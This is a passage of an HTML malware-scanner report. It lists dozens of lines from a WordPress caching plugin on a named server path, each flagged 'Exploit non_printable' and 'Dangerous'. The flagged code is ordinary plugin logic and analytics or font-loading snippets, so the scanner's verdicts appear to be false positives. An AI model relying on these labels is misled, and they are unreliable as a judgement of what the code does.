</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 111</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 116</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$res</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 154</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">display_transient_update_plugins </span><span style="color: #007700">(</span><span style="color: #0000BB">$transient</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 159</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$transient</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">after_update</span><span style="color: #007700">(</span><span style="color: #0000BB">$upgrader_object</span><span style="color: #007700">, </span><span style="color: #0000BB">$options</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addJavaScript</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 61</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">start</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 67</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_current_version</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 77</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_download_url</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 81</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_info</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_519").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/wp-fastest-cache-premium/pro/library/render-blocking.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 34.36 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2020-04-01 16:41:44</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:37</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 42</span><br><table id="file_520" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$all</span><span style="color: #007700">; } } } return </span><span style="color: #0000BB">false</span><span style="color: #007700">; } } </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 147</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 155</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function\(</span><span style="color: #0000BB">i</span><span style="color: #007700">,</span><span style="color: #0000BB">s</span><span style="color: #007700">,</span><span style="color: #0000BB">o</span><span style="color: #007700">,</span><span style="color: #0000BB">g</span><span style="color: #007700">,</span><span style="color: #0000BB">r</span><span style="color: #007700">,</span><span style="color: #0000BB">a</span><span style="color: #007700">,</span><span style="color: #0000BB">m</span><span style="color: #007700">\)\{</span><span style="color: #0000BB">i</span><span style="color: #007700">\[\</span><span style="color: #DD0000">'GoogleAnalyticsObject\'\]/i", $value["text"])){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">gtag</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_header_start_index</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">tags_reorder</span><span style="color: #007700">(</span><span style="color: #0000BB">$tags</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 315</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">w</span><span style="color: #007700">,</span><span style="color: #0000BB">d</span><span style="color: #007700">,</span><span style="color: #0000BB">s</span><span style="color: #007700">,</span><span style="color: #0000BB">l</span><span style="color: #007700">,</span><span style="color: #0000BB">i</span><span style="color: #007700">){</span><span style="color: #0000BB">w</span><span style="color: #007700">[</span><span style="color: #0000BB">l</span><span style="color: #007700">]=</span><span style="color: #0000BB">w</span><span style="color: #007700">[</span><span style="color: #0000BB">l</span><span style="color: #007700">]||[];</span><span style="color: #0000BB">w</span><span style="color: #007700">[</span><span style="color: #0000BB">l</span><span style="color: #007700">].</span><span style="color: #0000BB">push</span><span style="color: #007700">({</span><span style="color: #DD0000">'gtm.start'</span><span style="color: #007700">:</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 437</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_comments</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 453</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">find_tags</span><span style="color: #007700">(</span><span style="color: #0000BB">$start_string</span><span style="color: #007700">, </span><span style="color: #0000BB">$end_string</span><span style="color: #007700">, </span><span style="color: #0000BB">$html </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 492</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$list</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 495</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">action</span><span style="color: #007700">(</span><span style="color: #0000BB">$render_blocking_css </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">$make_defer </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 558</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function\(\)\{/</span><span style="color: #0000BB">i</span><span style="color: #DD0000">", </span><span style="color: #0000BB">$value</span><span style="color: #007700">[</span><span style="color: #DD0000">"</span><span style="color: #0000BB">text</span><span style="color: #DD0000">"</span><span style="color: #007700">]</span><span style="color: #DD0000">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 564</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function($){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 57</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$tags</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 587</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span><span style="color: #DD0000">", </span><span style="color: #0000BB">$value</span><span style="color: #007700">[</span><span style="color: #DD0000">"</span><span style="color: #0000BB">text</span><span style="color: #DD0000">"</span><span style="color: #007700">]</span><span style="color: #DD0000">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 60</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_except</span><span style="color: #007700">(</span><span style="color: #0000BB">$tags</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 619</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function|</span><span style="color: #0000BB">jQuery</span><span style="color: #007700">|if)\</span><span style="color: #0000BB">s</span><span style="color: #007700">*\([^\)\(]+\)/</span><span style="color: #0000BB">i</span><span style="color: #DD0000">", </span><span style="color: #0000BB">$tmp</span><span style="color: #DD0000">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 658</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function\(\)\{/</span><span style="color: #DD0000">", </span><span style="color: #0000BB">$tmp</span><span style="color: #DD0000">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 66</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_tags</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 72</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_css</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 736</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">"/^\s+/m"</span><span style="color: #007700">, </span><span style="color: #DD0000">""</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">html</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 739</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">async_google_fonts</span><span style="color: #007700">(</span><span style="color: #0000BB">$fonts</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 742</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){function </span><span style="color: #0000BB">wpfcgl</span><span style="color: #007700">(){var </span><span style="color: #0000BB">wgh</span><span style="color: #007700">=</span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">querySelector</span><span style="color: #007700">(</span><span style="color: #DD0000">'noscript#wpfc-google-fonts'</span><span style="color: #007700">).</span><span style="color: #0000BB">innerText</span><span style="color: #007700">, </span><span style="color: #0000BB">wgha</span><span style="color: #007700">=</span><span style="color: #0000BB">wgh</span><span style="color: #007700">.</span><span style="color: #0000BB">match</span><span style="color: #007700">(/<</span><span style="color: #0000BB">link</span><span style="color: #007700">[^\>]+>/</span><span style="color: #0000BB">gi</span><span style="color: #007700">);for(</span><span style="color: #0000BB">i</span><span style="color: #007700">=</span><span style="color: #0000BB">0</span><span style="color: #007700">;</span><span style="color: #0000BB">i</span><span style="color: #007700"><</span><span style="color: #0000BB">wgha</span><span style="color: #007700">.</span><span style="color: #0000BB">length</span><span style="color: #007700">;</span><span style="color: #0000BB">i</span><span style="color: #007700">++){var </span><span style="color: #0000BB">wrpr</span><span style="color: #007700">=</span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">createElement</span><span style="color: #007700">(</span><span style="color: #DD0000">'div'</span><span style="color: #007700">);</span><span style="color: #0000BB">wrpr</span><span style="color: #007700">.</span><span style="color: #0000BB">innerHTML</span><span style="color: #007700">=</span><span style="color: #0000BB">wgha</span><span style="color: #007700">[</span><span style="color: #0000BB">i</span><span style="color: #007700">];</span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">body</span><span style="color: #007700">.</span><span style="color: #0000BB">appendChild</span><span style="color: #007700">(</span><span style="color: #0000BB">wrpr</span><span style="color: #007700">.</span><span style="color: #0000BB">firstChild</span><span style="color: #007700">);}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 744</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$fonts</span><span style="color: #007700">.</span><span style="color: #DD0000">"\n"</span><span style="color: #007700">.</span><span style="color: #0000BB">$onload</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 747</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$fonts</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 750</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">combine_google_fonts</span><span style="color: #007700">(</span><span style="color: #0000BB">$fonts</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 774</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<!--\n"</span><span style="color: #007700">.</span><span style="color: #0000BB">$fonts</span><span style="color: #007700">.</span><span style="color: #DD0000">"\n-->\n"</span><span style="color: #007700">.</span><span style="color: #DD0000">"<link rel='stylesheet' id='wpfc-google-combined' href='http://fonts.googleapis.com/css?family="</span><span style="color: #007700">.</span><span style="color: #0000BB">$family</span><span style="color: #007700">.</span><span style="color: #DD0000">"' type='text/css' media='all'/>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 780</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_defer_attr</span><span style="color: #007700">(</span><span style="color: #0000BB">$tags</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 797</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function\(\\$\)\{[^\}\</span><span style="color: #0000BB">n</span><span style="color: #007700">]+\}\)\(</span><span style="color: #0000BB">jQuery</span><span style="color: #007700">\)\;\</span><span style="color: #0000BB">s</span><span style="color: #007700">*<\/</span><span style="color: #0000BB">script</span><span style="color: #007700">>/</span><span style="color: #DD0000">", </span><span style="color: #0000BB">$value</span><span style="color: #007700">[</span><span style="color: #DD0000">"</span><span style="color: #0000BB">text</span><span style="color: #DD0000">"</span><span style="color: #007700">]</span><span style="color: #DD0000">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 798</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function($){</span><span style="color: #DD0000">"use strict"</span><span style="color: #007700">;$(</span><span style="color: #DD0000">"html"</span><span style="color: #007700">).</span><span style="color: #0000BB">removeClass</span><span style="color: #007700">(</span><span style="color: #DD0000">"ut-no-js"</span><span style="color: #007700">).</span><span style="color: #0000BB">addClass</span><span style="color: #007700">(</span><span style="color: #DD0000">"ut-js js"</span><span style="color: #007700">);})(</span><span style="color: #0000BB">jQuery</span><span style="color: #007700">);</</span><span style="color: #0000BB">script</span><span style="color: #007700">></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 819</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">d</span><span style="color: #007700">, </span><span style="color: #0000BB">s</span><span style="color: #007700">, </span><span style="color: #0000BB">id</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 915</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">defer_load_inline_js</span><span style="color: #007700">(</span><span style="color: #0000BB">$script</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 928</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$script</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 931</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span><span style="color: #DD0000">", </span><span style="color: #0000BB">$script</span><span style="color: #DD0000">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 938</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_html_image_style</span><span style="color: #007700">(</span><span style="color: #0000BB">$value</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 941</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'<style>'</span><span style="color: #007700">.</span><span style="color: #0000BB">$value</span><span style="color: #007700">.</span><span style="color: #DD0000">"</style>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 948</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'<div style="display:none !important;"><img src="'</span><span style="color: #007700">.</span><span style="color: #0000BB">$value</span><span style="color: #007700">.</span><span style="color: #DD0000">'" /></div>'</span><span style="color: #007700">;</span>
</span>
